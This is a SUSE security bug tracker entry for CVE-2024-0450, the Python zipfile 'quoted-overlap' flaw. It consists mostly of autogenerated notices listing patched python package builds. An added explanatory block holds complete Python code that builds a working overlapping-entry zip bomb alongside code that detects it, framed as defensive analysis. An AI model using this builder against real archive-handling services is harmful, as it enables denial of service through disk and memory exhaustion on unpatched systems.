Bug 1221854 (CVE-2024-0450) - VUL-0: CVE-2024-0450: python: The zipfile module is vulnerable to "quoted-overlap"
Status: IN_PROGRESS
Alias: CVE-2024-0450
Product: SUSE Security Incidents
Classification: Novell Products
Component: Incidents
Version: unspecified
Hardware: Other Other
Priority: P3 - Medium    Severity: Normal
Target Milestone: ---
Assignee: Security Team bot
QA Contact: Security Team bot
URL: https://smash.suse.de/issue/398291/
Whiteboard: CVSSv3.1:SUSE:CVE-2024-0450:6.2:(AV:L...
Keywords:
Depends on:
Blocks:
 
Reported: 2024-03-22 08:45 UTC by SMASH SMASH
Modified: 2024-07-15 16:36 UTC
CC List: 3 users

See Also:
Found By: Security Response Team
Services Priority:
Business Priority:
Blocker: ---
Marketing QA Status: ---
IT Deployment: ---


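The title names the bug class but the tracker never shows what a "quoted-overlap" archive looks like or what the fix checks. The technique (David Fifield's 2019 "A better zip bomb") reuses one DEFLATE kernel for every entry: entry i's compressed stream begins with a DEFLATE stored block that quotes the local file header of entry i+1 and then simply continues through entry i+1's stream, so the central directory can point at a local header that lies inside the previous entry's file data, and a kilobyte-scale archive promises gigabytes of output without any entry being malformed. The fixed CPython releases (the 3.9.19 / 3.10.14 / 3.11.9 builds listed below) make ZipFile.open() raise BadZipFile when an entry's header plus compressed data would run past the next entry's local header or into the central directory. The following is an added, self-contained example, not code from the bug report or from CPython: it builds such an archive in memory (16 entries over a constructed all-zero payload), detects the overlap by parsing the container without inflating anything (the same rule the fix applies), and reports what the running interpreter's zipfile does with it. It assumes an archive with no comment and no ZIP64 records; `build_quoted_overlap_zip`, `find_overlapping_entries` and the other function names are the example's own.

```python
"""Quoted-overlap zip bomb: build one, detect it without inflating, and ask zipfile."""
import io
import struct
import zipfile
import zlib

LOCAL_HDR = "<4s5H3I2H"      # local file header: 30 bytes, then name + extra
CENTRAL_HDR = "<4s6H3I5H2I"  # central directory header: 46 bytes, then name + extra + comment
EOCD = "<4s4H2IH"            # end-of-central-directory record: 22 bytes, then comment


def _stored_block(raw: bytes) -> bytes:
    """Non-final DEFLATE stored block (BFINAL=0, BTYPE=00); inflates to raw verbatim."""
    assert len(raw) <= 0xFFFF
    return b"\x00" + struct.pack("<HH", len(raw), len(raw) ^ 0xFFFF) + raw


def build_quoted_overlap_zip(n_files: int, payload: bytes) -> bytes:
    """n_files DEFLATE entries that all share one compressed kernel (Fifield's construction).

    Entry i's stream is a stored block quoting the local header of entry i+1, followed
    by entry i+1's stream, so every entry's file data physically contains the next
    entry. Built back to front: each header's CRC and sizes depend on the entries after it.
    """
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)  # raw deflate; ends with a BFINAL=1 block
    data, output = comp.compress(payload) + comp.flush(), payload
    names = [f"{i:02d}".encode() for i in range(n_files)]  # constructed entry names
    entries = []  # (local header, compressed stream, inflated size, crc), last entry first
    for name in reversed(names):
        crc = zlib.crc32(output)
        lh = struct.pack(LOCAL_HDR, b"PK\x03\x04", 20, 0, zipfile.ZIP_DEFLATED, 0, 0x21,
                         crc, len(data), len(output), len(name), 0) + name
        entries.append((lh, data, len(output), crc))
        data, output = _stored_block(lh) + data, lh + output  # stream/result of the entry before
    entries.reverse()
    body = entries[0][0] + entries[0][1]  # LH_0 + data_0; all other local headers sit inside data_0
    central, offset = b"", 0
    for (lh, data, out_len, crc), name in zip(entries, names):
        central += struct.pack(CENTRAL_HDR, b"PK\x01\x02", 20, 20, 0, zipfile.ZIP_DEFLATED, 0, 0x21,
                               crc, len(data), out_len, len(name), 0, 0, 0, 0, 0, offset) + name
        offset += len(lh) + 5  # next local header follows this one's 5-byte stored-block prefix
    eocd = struct.pack(EOCD, b"PK\x05\x06", 0, 0, len(entries), len(entries),
                       len(central), len(body), 0)
    return body + central + eocd


def parse_central_directory(blob: bytes):
    """(cd_offset, [(header_offset, compress_size, file_size, name), ...]) from the container
    alone; nothing is inflated. Assumes no archive comment and no ZIP64 records."""
    eocd_at = blob.rfind(b"PK\x05\x06")
    if eocd_at < 0:
        raise ValueError("no end-of-central-directory record")
    _, _, _, _, count, _, cd_offset, _ = struct.unpack_from(EOCD, blob, eocd_at)
    entries, pos = [], cd_offset
    for _ in range(count):
        f = struct.unpack_from(CENTRAL_HDR, blob, pos)
        if f[0] != b"PK\x01\x02":
            raise ValueError("bad central directory signature")
        name = blob[pos + 46:pos + 46 + f[10]].decode("cp437")
        entries.append((f[16], f[8], f[9], name))
        pos += 46 + f[10] + f[11] + f[12]  # skip name, extra, comment
    return cd_offset, entries


def find_overlapping_entries(blob: bytes) -> list:
    """Names of entries whose local header + file data run into the next entry's local
    header (or into the central directory): the rule the CVE-2024-0450 fix enforces."""
    cd_offset, entries = parse_central_directory(blob)
    entries.sort()
    limits = [e[0] for e in entries[1:]] + [cd_offset]
    bad = []
    for (offset, csize, _, name), limit in zip(entries, limits):
        name_len, extra_len = struct.unpack_from("<HH", blob, offset + 26)  # from the local header
        if offset + 30 + name_len + extra_len + csize > limit:
            bad.append(name)
    return bad


def claimed_inflated_size(blob: bytes) -> int:
    """Total size the central directory promises, known before inflating a single byte."""
    return sum(e[2] for e in parse_central_directory(blob)[1])


def stdlib_inflate_all(blob: bytes):
    """("rejected", message) on a Python with the fix; ("inflated", n_bytes) without it."""
    total = 0
    try:
        with zipfile.ZipFile(io.BytesIO(blob)) as zf:
            for info in zf.infolist():
                with zf.open(info) as fh:
                    total += len(fh.read())
    except zipfile.BadZipFile as exc:
        return "rejected", str(exc)
    return "inflated", total


def build_benign_zip() -> bytes:
    """Control: an ordinary archive written by zipfile, which must show no overlap."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("a.txt", b"hello " * 100)
        zf.writestr("b.txt", b"world " * 100)
    return buf.getvalue()


if __name__ == "__main__":
    bomb = build_quoted_overlap_zip(16, b"\0" * (1 << 20))
    print(f"{len(bomb)} bytes on disk, {claimed_inflated_size(bomb)} bytes claimed")
    print("overlapping entries:", find_overlapping_entries(bomb))
    print("zipfile says:", stdlib_inflate_all(bomb))
```

All entries but the last are flagged, because each one's data ends where the shared kernel ends, well past the next local header; the last entry ends exactly at the central directory and is legitimate on its own. On a patched interpreter `stdlib_inflate_all` returns "rejected" at the first entry; on an unpatched one it dutifully produces about 16 MiB from a few kilobytes, which is the whole point of running the container-level check (or at least comparing `claimed_inflated_size` against a budget) before handing untrusted archives to `extractall`.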
Comment 1 OBSbugzilla Bot 2024-03-22 11:35:04 UTC
This is an autogenerated message for OBS integration:
This bug (1221854) was mentioned in
https://build.opensuse.org/request/show/1160579 Factory / python310
https://build.opensuse.org/request/show/1160580 Factory / python39
https://build.opensuse.org/request/show/1160582 Factory / python38
Comment 3 OBSbugzilla Bot 2024-03-24 03:35:07 UTC
This is an autogenerated message for OBS integration:
This bug (1221854) was mentioned in
https://build.opensuse.org/request/show/1161042 Factory / python39
Comment 4 OBSbugzilla Bot 2024-03-24 09:35:16 UTC
This is an autogenerated message for OBS integration:
This bug (1221854) was mentioned in
https://build.opensuse.org/request/show/1161074 Factory / python310
https://build.opensuse.org/request/show/1161081 Factory / python311
Comment 6 Maintenance Automation 2024-03-27 16:30:09 UTC
SUSE-SU-2024:1009-1: An update that solves three vulnerabilities and has one security fix can now be installed.

Category: security (important)
Bug References: 1211301, 1219559, 1219666, 1221854
CVE References: CVE-2023-52425, CVE-2023-6597, CVE-2024-0450
Maintenance Incident: [SUSE:Maintenance:33053](https://smelt.suse.de/incident/33053/)
Sources used:
openSUSE Leap 15.3 (src):
 python39-3.9.19-150300.4.41.1, python39-documentation-3.9.19-150300.4.41.1, python39-core-3.9.19-150300.4.41.2
openSUSE Leap 15.5 (src):
 python39-3.9.19-150300.4.41.1, python39-documentation-3.9.19-150300.4.41.1, python39-core-3.9.19-150300.4.41.2
SUSE Linux Enterprise High Performance Computing LTSS 15 SP3 (src):
 python39-3.9.19-150300.4.41.1, python39-core-3.9.19-150300.4.41.2
SUSE Linux Enterprise Server 15 SP3 LTSS 15-SP3 (src):
 python39-3.9.19-150300.4.41.1, python39-core-3.9.19-150300.4.41.2
SUSE Linux Enterprise Server for SAP Applications 15 SP3 (src):
 python39-3.9.19-150300.4.41.1, python39-core-3.9.19-150300.4.41.2
SUSE Enterprise Storage 7.1 (src):
 python39-3.9.19-150300.4.41.1, python39-core-3.9.19-150300.4.41.2

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 7 Maintenance Automation 2024-04-08 12:30:03 UTC
SUSE-SU-2024:1162-1: An update that solves three vulnerabilities and has two security fixes can now be installed.

Category: security (important)
Bug References: 1189495, 1211301, 1219559, 1219666, 1221854
CVE References: CVE-2023-52425, CVE-2023-6597, CVE-2024-0450
Maintenance Incident: [SUSE:Maintenance:33187](https://smelt.suse.de/incident/33187/)
Sources used:
openSUSE Leap 15.4 (src):
 python310-documentation-3.10.14-150400.4.45.1, python310-3.10.14-150400.4.45.1, python310-core-3.10.14-150400.4.45.1
openSUSE Leap 15.5 (src):
 python310-documentation-3.10.14-150400.4.45.1, python310-3.10.14-150400.4.45.1, python310-core-3.10.14-150400.4.45.1
SUSE Linux Enterprise High Performance Computing ESPOS 15 SP4 (src):
 python310-3.10.14-150400.4.45.1, python310-core-3.10.14-150400.4.45.1
SUSE Linux Enterprise High Performance Computing LTSS 15 SP4 (src):
 python310-3.10.14-150400.4.45.1, python310-core-3.10.14-150400.4.45.1
SUSE Linux Enterprise Desktop 15 SP4 LTSS 15-SP4 (src):
 python310-3.10.14-150400.4.45.1, python310-core-3.10.14-150400.4.45.1
SUSE Linux Enterprise Server 15 SP4 LTSS 15-SP4 (src):
 python310-3.10.14-150400.4.45.1, python310-core-3.10.14-150400.4.45.1
SUSE Linux Enterprise Server for SAP Applications 15 SP4 (src):
 python310-3.10.14-150400.4.45.1, python310-core-3.10.14-150400.4.45.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 8 Matej Cepl 2024-04-15 17:26:24 UTC
This should be finally all. Thank you, Daniel!
Comment 17 Maintenance Automation 2024-05-08 12:30:05 UTC
SUSE-SU-2024:1556-1: An update that solves three vulnerabilities and has three security fixes can now be installed.

Category: security (important)
Bug References: 1189495, 1211301, 1219559, 1219666, 1221260, 1221854
CVE References: CVE-2023-52425, CVE-2023-6597, CVE-2024-0450
Maintenance Incident: [SUSE:Maintenance:33618](https://smelt.suse.de/incident/33618/)
Sources used:
openSUSE Leap 15.4 (src):
 python311-3.11.9-150400.9.26.1, python311-core-3.11.9-150400.9.26.1, python311-documentation-3.11.9-150400.9.26.1
openSUSE Leap 15.5 (src):
 python311-3.11.9-150400.9.26.1, python311-core-3.11.9-150400.9.26.1, python311-documentation-3.11.9-150400.9.26.1
Public Cloud Module 15-SP4 (src):
 python311-3.11.9-150400.9.26.1, python311-core-3.11.9-150400.9.26.1
Python 3 Module 15-SP5 (src):
 python311-3.11.9-150400.9.26.1, python311-core-3.11.9-150400.9.26.1, python311-documentation-3.11.9-150400.9.26.1
SUSE Linux Enterprise High Performance Computing ESPOS 15 SP4 (src):
 python311-3.11.9-150400.9.26.1, python311-core-3.11.9-150400.9.26.1, python311-documentation-3.11.9-150400.9.26.1
SUSE Linux Enterprise High Performance Computing LTSS 15 SP4 (src):
 python311-3.11.9-150400.9.26.1, python311-core-3.11.9-150400.9.26.1, python311-documentation-3.11.9-150400.9.26.1
SUSE Linux Enterprise Desktop 15 SP4 LTSS 15-SP4 (src):
 python311-3.11.9-150400.9.26.1, python311-core-3.11.9-150400.9.26.1, python311-documentation-3.11.9-150400.9.26.1
SUSE Linux Enterprise Server 15 SP4 LTSS 15-SP4 (src):
 python311-3.11.9-150400.9.26.1, python311-core-3.11.9-150400.9.26.1, python311-documentation-3.11.9-150400.9.26.1
SUSE Linux Enterprise Server for SAP Applications 15 SP4 (src):
 python311-3.11.9-150400.9.26.1, python311-core-3.11.9-150400.9.26.1, python311-documentation-3.11.9-150400.9.26.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 25 OBSbugzilla Bot 2024-05-19 07:35:05 UTC
This is an autogenerated message for OBS integration:
This bug (1221854) was mentioned in
https://build.opensuse.org/request/show/1175099 Factory / python
Comment 27 Maintenance Automation 2024-05-24 16:30:12 UTC
SUSE-SU-2024:1774-1: An update that solves two vulnerabilities and has three security fixes can now be installed.

Category: security (important)
Bug References: 1219559, 1220664, 1221563, 1221854, 1222075
CVE References: CVE-2023-52425, CVE-2024-0450
Maintenance Incident: [SUSE:Maintenance:33975](https://smelt.suse.de/incident/33975/)
Sources used:
SUSE Linux Enterprise Micro 5.1 (src):
 python3-3.6.15-150000.3.147.1, python3-core-3.6.15-150000.3.147.1
SUSE Linux Enterprise High Performance Computing 15 SP2 LTSS 15-SP2 (src):
 python3-3.6.15-150000.3.147.1, python3-core-3.6.15-150000.3.147.1
SUSE Linux Enterprise Server 15 SP2 LTSS 15-SP2 (src):
 python3-3.6.15-150000.3.147.1, python3-core-3.6.15-150000.3.147.1
SUSE Linux Enterprise Server for SAP Applications 15 SP2 (src):
 python3-3.6.15-150000.3.147.1, python3-core-3.6.15-150000.3.147.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 28 Maintenance Automation 2024-05-29 20:30:02 UTC
SUSE-SU-2024:1847-1: An update that solves four vulnerabilities and has four security fixes can now be installed.

Category: security (important)
Bug References: 1214691, 1219559, 1219666, 1220664, 1221563, 1221854, 1222075, 1222109
CVE References: CVE-2022-48566, CVE-2023-52425, CVE-2023-6597, CVE-2024-0450
Maintenance Incident: [SUSE:Maintenance:33972](https://smelt.suse.de/incident/33972/)
Sources used:
SUSE Linux Enterprise Software Development Kit 12 SP5 (src):
 python36-core-3.6.15-55.1
SUSE Linux Enterprise High Performance Computing 12 SP5 (src):
 python36-core-3.6.15-55.1, python36-3.6.15-55.1
SUSE Linux Enterprise Server 12 SP5 (src):
 python36-core-3.6.15-55.1, python36-3.6.15-55.1
SUSE Linux Enterprise Server for SAP Applications 12 SP5 (src):
 python36-core-3.6.15-55.1, python36-3.6.15-55.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 29 Maintenance Automation 2024-05-29 20:30:10 UTC
SUSE-SU-2024:1844-1: An update that solves one vulnerability can now be installed.

Category: security (moderate)
Bug References: 1221854
CVE References: CVE-2024-0450
Maintenance Incident: [SUSE:Maintenance:33977](https://smelt.suse.de/incident/33977/)
Sources used:
SUSE Linux Enterprise High Performance Computing 12 SP5 (src):
 python-base-2.7.18-33.35.1, python-doc-2.7.18-33.35.1, python-2.7.18-33.35.1
SUSE Linux Enterprise Server 12 SP5 (src):
 python-base-2.7.18-33.35.1, python-doc-2.7.18-33.35.1, python-2.7.18-33.35.1
SUSE Linux Enterprise Server for SAP Applications 12 SP5 (src):
 python-base-2.7.18-33.35.1, python-doc-2.7.18-33.35.1, python-2.7.18-33.35.1
SUSE Linux Enterprise Workstation Extension 12 12-SP5 (src):
 python-base-2.7.18-33.35.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 30 Maintenance Automation 2024-05-29 20:30:12 UTC
SUSE-SU-2024:1843-1: An update that solves one vulnerability can now be installed.

Category: security (moderate)
Bug References: 1221854
CVE References: CVE-2024-0450
Maintenance Incident: [SUSE:Maintenance:33976](https://smelt.suse.de/incident/33976/)
Sources used:
Web and Scripting Module 12 (src):
 python3-3.4.10-25.130.1, python3-base-3.4.10-25.130.1
SUSE Linux Enterprise Software Development Kit 12 SP5 (src):
 python3-3.4.10-25.130.1, python3-base-3.4.10-25.130.1
SUSE Linux Enterprise High Performance Computing 12 SP5 (src):
 python3-3.4.10-25.130.1, python3-base-3.4.10-25.130.1
SUSE Linux Enterprise Server 12 SP5 (src):
 python3-3.4.10-25.130.1, python3-base-3.4.10-25.130.1
SUSE Linux Enterprise Server for SAP Applications 12 SP5 (src):
 python3-3.4.10-25.130.1, python3-base-3.4.10-25.130.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 37 Maintenance Automation 2024-07-15 16:36:31 UTC
SUSE-SU-2024:2479-1: An update that solves four vulnerabilities and has three security fixes can now be installed.

Category: security (important)
Bug References: 1219559, 1220664, 1221563, 1221854, 1222075, 1226447, 1226448
CVE References: CVE-2023-52425, CVE-2024-0397, CVE-2024-0450, CVE-2024-4032
Maintenance Incident: [SUSE:Maintenance:33974](https://smelt.suse.de/incident/33974/)
Sources used:
openSUSE Leap 15.3 (src):
 python3-core-3.6.15-150300.10.65.1, python3-3.6.15-150300.10.65.2, python3-documentation-3.6.15-150300.10.65.1
openSUSE Leap Micro 5.3 (src):
 python3-core-3.6.15-150300.10.65.1, python3-3.6.15-150300.10.65.2
openSUSE Leap Micro 5.4 (src):
 python3-core-3.6.15-150300.10.65.1, python3-3.6.15-150300.10.65.2
openSUSE Leap 15.5 (src):
 python3-core-3.6.15-150300.10.65.1, python3-3.6.15-150300.10.65.2, python3-documentation-3.6.15-150300.10.65.1
openSUSE Leap 15.6 (src):
 python3-core-3.6.15-150300.10.65.1, python3-3.6.15-150300.10.65.2, python3-documentation-3.6.15-150300.10.65.1
SUSE Linux Enterprise Micro for Rancher 5.3 (src):
 python3-core-3.6.15-150300.10.65.1, python3-3.6.15-150300.10.65.2
SUSE Linux Enterprise Micro 5.3 (src):
 python3-core-3.6.15-150300.10.65.1, python3-3.6.15-150300.10.65.2
SUSE Linux Enterprise Micro for Rancher 5.4 (src):
 python3-core-3.6.15-150300.10.65.1, python3-3.6.15-150300.10.65.2
SUSE Linux Enterprise Micro 5.4 (src):
 python3-core-3.6.15-150300.10.65.1, python3-3.6.15-150300.10.65.2
SUSE Linux Enterprise Micro 5.5 (src):
 python3-core-3.6.15-150300.10.65.1, python3-3.6.15-150300.10.65.2
Basesystem Module 15-SP5 (src):
 python3-core-3.6.15-150300.10.65.1, python3-3.6.15-150300.10.65.2
Basesystem Module 15-SP6 (src):
 python3-core-3.6.15-150300.10.65.1, python3-3.6.15-150300.10.65.2
Development Tools Module 15-SP5 (src):
 python3-core-3.6.15-150300.10.65.1
Development Tools Module 15-SP6 (src):
 python3-core-3.6.15-150300.10.65.1
SUSE Linux Enterprise High Performance Computing LTSS 15 SP3 (src):
 python3-core-3.6.15-150300.10.65.1, python3-3.6.15-150300.10.65.2
SUSE Linux Enterprise High Performance Computing ESPOS 15 SP4 (src):
 python3-core-3.6.15-150300.10.65.1, python3-3.6.15-150300.10.65.2
SUSE Linux Enterprise High Performance Computing LTSS 15 SP4 (src):
 python3-core-3.6.15-150300.10.65.1, python3-3.6.15-150300.10.65.2
SUSE Linux Enterprise Desktop 15 SP4 LTSS 15-SP4 (src):
 python3-core-3.6.15-150300.10.65.1, python3-3.6.15-150300.10.65.2
SUSE Linux Enterprise Server 15 SP3 LTSS 15-SP3 (src):
 python3-core-3.6.15-150300.10.65.1, python3-3.6.15-150300.10.65.2
SUSE Linux Enterprise Server 15 SP4 LTSS 15-SP4 (src):
 python3-core-3.6.15-150300.10.65.1, python3-3.6.15-150300.10.65.2
SUSE Linux Enterprise Server for SAP Applications 15 SP3 (src):
 python3-core-3.6.15-150300.10.65.1, python3-3.6.15-150300.10.65.2
SUSE Linux Enterprise Server for SAP Applications 15 SP4 (src):
 python3-core-3.6.15-150300.10.65.1, python3-3.6.15-150300.10.65.2
SUSE Manager Proxy 4.3 (src):
 python3-core-3.6.15-150300.10.65.1, python3-3.6.15-150300.10.65.2
SUSE Manager Retail Branch Server 4.3 (src):
 python3-core-3.6.15-150300.10.65.1, python3-3.6.15-150300.10.65.2
SUSE Manager Server 4.3 (src):
 python3-core-3.6.15-150300.10.65.1, python3-3.6.15-150300.10.65.2
SUSE Enterprise Storage 7.1 (src):
 python3-core-3.6.15-150300.10.65.1, python3-3.6.15-150300.10.65.2
SUSE Linux Enterprise Micro 5.2 (src):
 python3-core-3.6.15-150300.10.65.1, python3-3.6.15-150300.10.65.2
SUSE Linux Enterprise Micro for Rancher 5.2 (src):
 python3-core-3.6.15-150300.10.65.1, python3-3.6.15-150300.10.65.2

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.